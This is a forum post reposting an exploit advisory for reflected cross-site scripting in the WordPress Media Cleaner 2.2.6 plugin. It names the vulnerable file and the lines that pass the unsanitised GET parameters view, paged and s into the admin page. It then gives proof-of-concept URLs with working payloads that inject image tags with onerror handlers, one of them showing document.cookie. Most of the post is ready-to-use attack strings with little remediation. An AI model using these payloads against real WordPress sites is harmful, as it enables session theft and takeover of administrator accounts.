Jump to content
Aerosol

WordPress Media Cleaner 2.2.6 Cross Site Scripting

Recommended Posts

Posted

# Exploit Title: Wordpress Media Cleaner - XSS
# Author: ?smail SAYGILI
# Web Site: www.ismailsaygili.com.tr
# E-Mail: iletisim@ismailsaygili.com.tr
# Date: 2015-02-26
# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip
# Version: 2.2.6


# Vulnerable File(s):
[+] wp-media-cleaner.php

# Vulnerable Code(s):
[+] 647. Line
$view = $_GET['view'] : "issues";
[+] 648. Line
$paged = $_GET['paged'] : 1;
[+] 653. Line
$s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;

# Request Method(s):
[+] GET

# Vulnerable Parameter(s):
[+] view, paged, s



# Proof of Concept

--> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS}

--> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.cookie)>&s="><img src=i onerror=prompt(/XSS/)>

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...